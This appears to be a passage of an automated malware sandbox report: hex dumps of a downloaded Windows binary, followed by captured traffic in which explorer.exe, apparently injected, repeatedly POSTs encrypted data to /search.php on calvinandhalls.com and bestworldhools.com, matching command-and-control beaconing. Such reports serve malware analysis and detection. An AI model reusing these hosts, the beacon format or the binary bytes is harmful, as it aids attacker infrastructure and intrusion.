                                        2024-10-07 12:59:48 UTC8000INData Raw: b5 d0 fd ff ff 89 bd cc fd ff ff 66 8c 95 f8 fd ff ff 66 8c 8d ec fd ff ff 66 8c 9d c8 fd ff ff 66 8c 85 c4 fd ff ff 66 8c a5 c0 fd ff ff 66 8c ad bc fd ff ff 9c 8f 85 f0 fd ff ff 8b 45 04 8d 4d 04 89 8d f4 fd ff ff c7 85 30 fd ff ff 01 00 01 00 89 85 e8 fd ff ff 8b 49 fc 89 8d e4 fd ff ff 8b 4d 0c 89 8d e0 fc ff ff 8b 4d 10 89 8d e4 fc ff ff 89 85 ec fc ff ff ff 15 6c d1 40 00 6a 00 8b f8 ff 15 68 d1 40 00 8d 85 d8 fc ff ff 50 ff 15 64 d1 40 00 85 c0 75 10 85 ff 75 0c 83 fb ff 74 07 53 e8 30 40 00 00 59 8b 4d fc 5f 33 cd 5b e8 63 f3 ff ff c9 c3 8b ff 56 6a 01 be 17 04 00 c0 56 6a 02 e8 c5 fe ff ff 83 c4 0c 56 ff 15 74 d1 40 00 50 ff 15 70 d1 40 00 5e c3 8b ff 55 8b ec ff 35 30 ee 44 00 ff 15 10 d1 40 00 85 c0 74 03 5d ff e0 ff 75 18 ff 75 14 ff 75 10 ff
                                        Data Ascii: ffffffEM0IMMl@jh@Pd@uutS0@YM_3[cVjVjVt@Pp@^U50D@t]uuu
                                        2024-10-07 12:59:48 UTC8000INData Raw: e8 53 ea ff ff 83 65 fc 00 e8 37 ea ff ff 83 4d fc ff e8 f5 e9 ff ff e8 53 ec ff ff 8b 4d 08 6a 00 6a 00 89 88 94 00 00 00 e8 6d d0 ff ff cc 6a 2c 68 68 73 44 00 e8 bc f0 ff ff 8b d9 8b 7d 0c 8b 75 08 89 5d e4 83 65 cc 00 8b 47 fc 89 45 dc ff 76 18 8d 45 c4 50 e8 78 d3 ff ff 59 59 89 45 d8 e8 09 ec ff ff 8b 80 88 00 00 00 89 45 d4 e8 fb eb ff ff 8b 80 8c 00 00 00 89 45 d0 e8 ed eb ff ff 89 b0 88 00 00 00 e8 e2 eb ff ff 8b 4d 10 89 88 8c 00 00 00 83 65 fc 00 33 c0 40 89 45 10 89 45 fc ff 75 1c ff 75 18 53 ff 75 14 57 e8 c6 d3 ff ff 83 c4 14 89 45 e4 83 65 fc 00 eb 6f 8b 45 ec e8 e1 fd ff ff c3 8b 65 e8 e8 9f eb ff ff 83 a0 0c 02 00 00 00 8b 75 14 8b 7d 0c 81 7e 04 80 00 00 00 7f 06 0f be 4f 08 eb 03 8b 4f 08 8b 5e 10 83 65 e0 00 8b 45 e0 3b 46 0c 73 18 6b
                                        Data Ascii: Se7MSMjjmj,hhsD}u]eGEvEPxYYEEEMe3@EEuuSuWEeoEeu}~OO^eE;Fsk
                                        2024-10-07 12:59:48 UTC8000INData Raw: 70 ff ff ff 07 c3 c6 85 70 ff ff ff 01 dc 05 a4 ee 40 00 c3 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 07 eb 07 c6 85 70 ff ff ff 01 de c1 c3 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 20 d9 c9 db bd 62 ff ff ff db ad 62 ff ff ff f6 85 69 ff ff ff 40 74 09 c6 85 70 ff ff ff 07 eb 07 c6 85 70 ff ff ff 01 de c1 c3 dd d8 dd d8 db 2d 90 ee 40 00 80 bd 70 ff ff ff 00 7f 07 c6 85 70 ff ff ff 01 0a c9 c3 0a c9 74 02 d9 e0 c3 b8 cd 9d 40 00 a3 68 94 44 00 c7 05 6c 94 44 00 c3 94 40 00 c7 05 70 94 44 00 77 94 40 00 c7 05 74 94 44 00 b0 94 40 00 c7 05 78 94 44 00 19 94 40 00 a3 7c 94 44 00 c7 05 80 94 44 00 45 9d 40 00 c7 05 84 94 44 00 35 94 40 00 c7 05 88 94 44 00 97 93 40 00 c7 05 8c 94 44 00 23 93 40
                                        Data Ascii: pp@bbi@tppbbi@t bbi@tpp-@ppt@hDlD@pDw@tD@xD@|DDE@D5@D@D#@
                                        2024-10-07 12:59:48 UTC8000INData Raw: 40 39 45 0c 77 0e e8 91 a3 ff ff 6a 22 59 89 08 8b f1 eb d0 57 8d 7e 01 c6 06 30 8b c7 85 d2 7e 1a 8a 0b 84 c9 74 06 0f be c9 43 eb 03 6a 30 59 88 08 40 4a 85 d2 7f e9 8b 4d 14 c6 00 00 85 d2 78 12 80 3b 35 7c 0d eb 03 c6 00 30 48 80 38 39 74 f7 fe 00 80 3e 31 75 05 ff 41 04 eb 12 57 e8 63 89 ff ff 40 50 57 56 e8 ba 85 ff ff 83 c4 10 33 c0 5f 5e 5b 5d c3 8b ff 55 8b ec 51 8b 4d 0c 0f b7 41 06 53 8b d8 c1 eb 04 25 00 80 00 00 56 ba ff 07 00 00 23 da 57 89 45 0c 8b 41 04 8b 09 0f b7 fb be 00 00 00 80 25 ff ff 0f 00 89 75 fc 85 ff 74 13 3b fa 74 08 81 c3 00 3c 00 00 eb 28 bf ff 7f 00 00 eb 24 33 d2 3b c2 75 12 3b ca 75 0e 8b 45 08 66 8b 4d 0c 89 50 04 89 10 eb 42 81 c3 01 3c 00 00 89 55 fc 0f b7 fb 8b d1 c1 ea 15 c1 e0 0b 0b d0 0b 55 fc 8b 45 08 c1 e1 0b eb
                                        Data Ascii: @9Ewj"YW~0~tCj0Y@JMx;5|0H89t>1uAWc@PWV3_^[]UQMAS%V#WEA%ut;t<($3;u;uEfMPB<UUE
                                        2024-10-07 12:59:48 UTC8000INData Raw: 02 74 05 0d 00 08 00 00 f6 c2 01 74 05 0d 00 10 00 00 bf 00 01 00 00 f7 c2 00 00 08 00 74 02 0b c7 8b ca be 00 03 00 00 23 ce 74 1f 3b cf 74 16 3b cb 74 0b 3b ce 75 13 0d 00 60 00 00 eb 0c 0d 00 40 00 00 eb 05 0d 00 20 00 00 b9 00 00 00 03 5f 23 d1 5e 5b 81 fa 00 00 00 01 74 16 81 fa 00 00 00 02 74 0a 3b d1 75 0f 0d 00 80 00 00 c3 83 c8 40 c3 0d 40 80 00 00 c3 8b ff 55 8b ec 83 ec 14 53 56 57 9b d9 7d fc 66 8b 5d fc 33 d2 f6 c3 01 74 03 6a 10 5a f6 c3 04 74 03 83 ca 08 f6 c3 08 74 03 83 ca 04 f6 c3 10 74 03 83 ca 02 f6 c3 20 74 03 83 ca 01 f6 c3 02 74 06 81 ca 00 00 08 00 0f b7 cb 8b c1 be 00 0c 00 00 23 c6 bf 00 03 00 00 74 24 3d 00 04 00 00 74 17 3d 00 08 00 00 74 08 3b c6 75 12 0b d7 eb 0e 81 ca 00 02 00 00 eb 06 81 ca 00 01 00 00 23 cf 74 10 81 f9 00
                                        Data Ascii: ttt#t;t;t;u`@ _#^[tt;u@@USVW}f]3tjZttt tt#t$=t=t;u#t
                                        2024-10-07 12:59:48 UTC8000INData Raw: 6e 6f 74 20 69 6d 70 6c 65 6d 65 6e 74 65 64 00 00 00 00 4e 6f 20 6c 6f 63 6b 73 20 61 76 61 69 6c 61 62 6c 65 00 00 46 69 6c 65 6e 61 6d 65 20 74 6f 6f 20 6c 6f 6e 67 00 00 00 52 65 73 6f 75 72 63 65 20 64 65 61 64 6c 6f 63 6b 20 61 76 6f 69 64 65 64 00 00 00 52 65 73 75 6c 74 20 74 6f 6f 20 6c 61 72 67 65 00 00 00 00 44 6f 6d 61 69 6e 20 65 72 72 6f 72 00 00 00 00 42 72 6f 6b 65 6e 20 70 69 70 65 00 54 6f 6f 20 6d 61 6e 79 20 6c 69 6e 6b 73 00 00 52 65 61 64 2d 6f 6e 6c 79 20 66 69 6c 65 20 73 79 73 74 65 6d 00 00 00 49 6e 76 61 6c 69 64 20 73 65 65 6b 00 00 00 00 4e 6f 20 73 70 61 63 65 20 6c 65 66 74 20 6f 6e 20 64 65 76 69 63 65 00 46 69 6c 65 20 74 6f 6f 20 6c 61 72 67 65 00 00 49 6e 61 70 70 72 6f 70 72 69 61 74 65 20 49 2f 4f 20 63 6f 6e 74 72 6f
                                        Data Ascii: not implementedNo locks availableFilename too longResource deadlock avoidedResult too largeDomain errorBroken pipeToo many linksRead-only file systemInvalid seekNo space left on deviceFile too largeInappropriate I/O contro
                                        2024-10-07 12:59:48 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii:
                                        2024-10-07 12:59:48 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                        Data Ascii:


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.550012188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:00:14 UTC289OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://qchnpedxxogxdjn.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 112
                                        Host: calvinandhalls.com
                                        2024-10-07 13:00:14 UTC112OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 33 f8 12 a6 b3 ca 06 5d b3 7c 14 b1 72 cb 80 63 0a e1 68 17 23 d4 fd d3 2d b7 b5 7b 02 de 98 59 a1 03
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<3]|rch#-{Y
                                        2024-10-07 13:00:14 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:00:14 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.550013188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:00:16 UTC287OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://oqqsbiatqglrn.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 176
                                        Host: bestworldhools.com
                                        2024-10-07 13:00:16 UTC176OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 32 b3 3a 90 ad cc 5c 07 de 09 19 a5 61 fb 86 64 2c c3 73 26 41 b3 fd e1 42 ea c7 54 0b db 8c 58 91 50 23 b2 de 59 3b 63 44 32 52 c4 15 88 85 8c 2d f8 85 2d 79 56 f2 55 47 d3 5f 69 ca ff 81 a0 14 3f be 50 fd 6e fb 0d 4b a2 5b da 7b 35 75 26 50 b7 e5 1f f4 96 1b fb 5b 10 d1 ce aa 4a a2 fc 56 d9
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<2:\ad,s&ABTXP#Y;cD2R--yVUG_i?PnK[{5u&P[JV
                                        2024-10-07 13:00:18 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:00:17 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        3192.168.2.550017188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:01:32 UTC290OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://xoybtutnnxkecaqf.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 262
                                        Host: calvinandhalls.com
                                        2024-10-07 13:01:32 UTC262OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 6c b4 66 96 a6 d6 45 58 de 0c 31 91 4d 8d c7 1c 61 e0 03 3d 63 b9 d3 9f 72 d0 a0 7e 7f ee 9e 79 94 4f 60 e7 88 5c 74 3f 55 35 0d 83 62 aa 85 83 5d f1 af 73 75 3b bf 08 3e fe 33 51 c8 94 98 98 26 01 b6 72 fc 71 8a 72 5a a8 39 d9 44 55 68 6d 04 d2 fa 4a ae c9 62 f8 09 66 9d ed d9 28 de a1 40 97 8f e6 9c 4a 3e 93 a0 d7 7b 53 c8 1c 10 8a 32 6e 26 e3 63 1d 76 d9 5a 67 35 86 d4 fd 22 63 be cb 29 f2 58 9e fe fe 0c 1a 76 71 f9 74 24 74 08 2d e8 3d b9 d6 12 20 11 72 26 84 bc 3a 3b 14 23 9e 81 fb 41 cc eb 0b c5 60 c7 f1 f0 c2 14 bc 59
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<lfEX1Ma=cr~yO`\t?U5b]su;>3Q&rqrZ9DUhmJbf(@J>{S2n&cvZg5"c)Xvqt$t-= r&:;#A`Y
                                        2024-10-07 13:01:32 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:01:32 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        4192.168.2.550018188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:01:33 UTC288OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://cqxtjrqcgsayay.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 251
                                        Host: bestworldhools.com
                                        2024-10-07 13:01:33 UTC251OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 59 c1 37 f4 ae bf 36 0e e9 0a 16 ff 5f 86 c9 2f 67 a3 64 40 23 ca b8 9a 4b c1 ed 56 45 d1 8a 3f ea 57 46 83 f5 03 08 47 16 2e 2e d2 75 b7 e1 b9 5e df f7 75 35 58 a8 5c 41 bb 57 00 98 d2 93 82 4b 77 85 40 c1 69 8d 03 72 93 48 bb 2d 35 2e 33 6c e6 f0 00 9b 95 73 ea 5f 1a e4 a2 a1 03 b9 ec 7d b2 b6 aa ba 57 50 a3 99 c2 7b 00 b6 74 4a 83 3c 65 2c e9 73 76 7f a1 4e 1c 07 d2 84 df 38 30 8e a6 1e e7 27 85 f4 bd 2d 68 23 4a c8 7f 7a 5c 3f 26 c2 1f ba 96 12 34 05 4e 38 d1 99 55 46 20 38 98 82 88 5c f0 f1 09 d8 71 bb 93 86
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<Y76_/gd@#KVE?WFG..u^u5X\AWKw@irH-5.3ls_}WP{tJ<e,svN80'-h#Jz\?&4N8UF 8\q
                                        2024-10-07 13:01:33 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:01:33 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        5192.168.2.550020188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:01:54 UTC290OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://nihavgqtcpkgtcxt.com/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 111
                                        Host: calvinandhalls.com
                                        2024-10-07 13:01:54 UTC111OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 37 f5 64 fa ab ab 55 1d c7 66 71 e0 7c d7 e6 2a 08 fd 2c 40 34 d1 a7 9c 65 ee df 77 0f e2 9b 76 db
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<7dUfq|*,@4ewv
                                        2024-10-07 13:01:55 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:01:55 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        6192.168.2.550021188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:01:56 UTC286OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://uheybmputpop.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 267
                                        Host: bestworldhools.com
                                        2024-10-07 13:01:56 UTC267OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 46 e8 07 b0 a8 ed 00 06 e8 13 33 be 20 dc 93 08 3e ec 05 49 20 92 c4 ec 26 c8 bb 6f 66 97 bb 22 a9 5e 5a b1 fb 60 0a 5b 45 1e 2d f5 16 c6 f4 88 4d e9 e1 23 23 56 8b 55 03 fe 69 08 89 86 8e dc 04 75 cd 6a ed 21 b6 65 42 c3 25 8a 78 45 45 32 1d bd f9 70 99 8b 2a d7 27 16 87 d5 9e 1b c0 f1 46 9f 8c 87 b5 5f 61 d2 d9 c7 11 0c ae 06 1a c2 25 79 26 f4 4b 05 72 c4 0e 76 19 ee 88 f9 2d 73 93 cf 1f ba 3d f5 fb bc 73 65 6d 5f cc 60 60 6f 27 6b f9 18 9f d1 77 22 1c 50 4e f3 93 7e 2a 09 4a 91 cd c6 5f d8 d5 2b f5 5c a0 89 c7 ac 15 d8 36
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<F3 >I &of"^Z`[E-M##VUiuj!eB%xEE2p*'F_a%y&Krv-s=sem_``o'kw"PN~*J_+\6
                                        2024-10-07 13:01:56 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:01:56 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        7192.168.2.550023188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:02:16 UTC285OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://glhqomjbdpj.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 269
                                        Host: calvinandhalls.com
                                        2024-10-07 13:02:16 UTC269OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 5c dc 25 b0 b5 ca 4f 37 c8 73 7e 95 22 dc 90 74 15 c6 66 04 26 ae bd e3 76 ea b6 1d 0d db a6 20 b8 42 29 8e 93 4d 2c 7b 42 1f 21 cf 1a 91 c2 cb 28 d7 96 50 7e 33 f4 11 02 d7 4c 47 e5 ce b3 c7 06 2b b9 75 bb 2d b6 74 3d 89 54 cc 45 58 52 03 57 e4 c8 7e f3 b0 12 84 33 32 9a ea 94 42 a6 e6 71 e0 de f3 cc 4e 4a 8b cf 8d 00 20 b0 6f 5a e6 3d 48 4a 9c 35 71 22 fa 58 73 41 d5 a5 c6 66 7a 82 b8 7a 83 78 dc e1 f8 10 0a 0f 49 d9 18 1c 05 2d 6d b9 52 f3 a4 12 4b 00 6e 32 9e 9d 33 66 28 16 9c ca e6 24 c8 fe 7f d3 26 84 e0 fc ab 17 b7 4d
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<\%O7s~"tf&v B)M,{B!(P~3LG+u-t=TEXRW~32BqNJ oZ=HJ5q"XsAfzzxI-mRKn23f($&M
                                        2024-10-07 13:02:17 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:02:16 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        8192.168.2.550024188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:02:17 UTC289OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://xnhhfayqvhtyngw.net/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 175
                                        Host: bestworldhools.com
                                        2024-10-07 13:02:17 UTC175OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 6f d5 13 b7 af f8 10 30 b9 33 1a fa 79 d1 f6 31 7c a8 02 37 4c 9d b1 97 78 d0 a7 68 69 e7 f2 7e af 2f 52 96 d8 00 2b 35 4b 56 03 f9 18 d2 95 c3 45 ef 9e 61 2e 57 94 10 5e ef 25 5d cc f2 89 ae 35 78 ab 01 d3 40 f1 70 31 bf 22 80 2d 33 5d 1b 1a c2 f4 58 b2 d1 6c 88 0a 15 8d e4 9c 10 fc f2 36
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<o03y1|7Lxhi~/R+5KVEa.W^%]5x@p1"-3]Xl6
                                        2024-10-07 13:02:17 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:02:17 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        9192.168.2.550026188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:02:39 UTC287OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://hptbtnqwmmhbw.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 264
                                        Host: calvinandhalls.com
                                        2024-10-07 13:02:39 UTC264OUTData Raw: 72 19 89 ce fa 7a 60 8c 1c f3 ed 64 4e f3 12 2b dc 87 c2 d6 65 7e 46 86 04 77 b6 90 ef d1 36 98 01 ec b6 f2 03 fa db f4 82 00 d0 c4 ea 28 23 bc bb bc 25 0a 50 20 67 33 fa a7 84 b4 ec 69 71 0c 18 48 5b dd 43 4c 6a 34 01 83 b6 25 93 3c 55 d5 28 8b 94 f2 02 38 e0 12 7d 80 23 9b ce 0a 7b eb 30 2b 33 ac c0 f0 3f b0 b6 62 58 f6 85 52 82 31 24 e2 dc 17 08 43 78 45 47 85 62 8f f4 a2 2c e7 85 40 68 2e 91 41 30 c9 2c 5c fa 8e ae 94 00 26 d0 1f f6 4b a0 31 4e b6 44 bc 3b 2c 3b 17 7b d5 b3 01 ad a8 7b da 2d 75 8c f8 82 52 dd 8a 0f b0 c3 f9 8c 5b 75 be 80 95 5c 41 8d 42 0f 91 74 1a 4b b5 54 21 49 f1 06 74 24 8b b3 80 64 23 b0 a4 37 ad 22 c5 a7 c9 3e 05 2f 38 d8 15 7e 12 2f 2f ce 31 fd 9d 66 41 32 37 57 82 8a 78 27 0d 04 c2 c8 c8 01 c5 e9 37 d5 2c ca 94 d3 b0 0e d0 38
                                        Data Ascii: rz`dN+e~Fw6(#%P g3iqH[CLj4%<U(8}#{0+3?bXR1$CxEGb,@h.A0,\&K1ND;,;{{-uR[u\ABtKT!It$d#7">/8~//1fA27Wx'7,8
                                        2024-10-07 13:02:40 UTC163INHTTP/1.1 404 Not Found
                                        Server: nginx/1.18.0
                                        Content-Length: 0
                                        Content-Type: application/octet-stream
                                        Date: Mon, 07 Oct 2024 13:02:39 GMT
                                        Connection: close


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        10192.168.2.550027188.40.141.2114431028C:\Windows\explorer.exe
                                        TimestampBytes transferredDirectionData
                                        2024-10-07 13:02:40 UTC290OUTPOST /search.php HTTP/1.1
                                        Connection: Keep-Alive
                                        Content-Type: application/x-www-form-urlencoded
                                        Accept: */*
                                        Referer: https://klstdrudvxhgouey.org/
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                        Content-Length: 278
                                        Host: bestworldhools.com
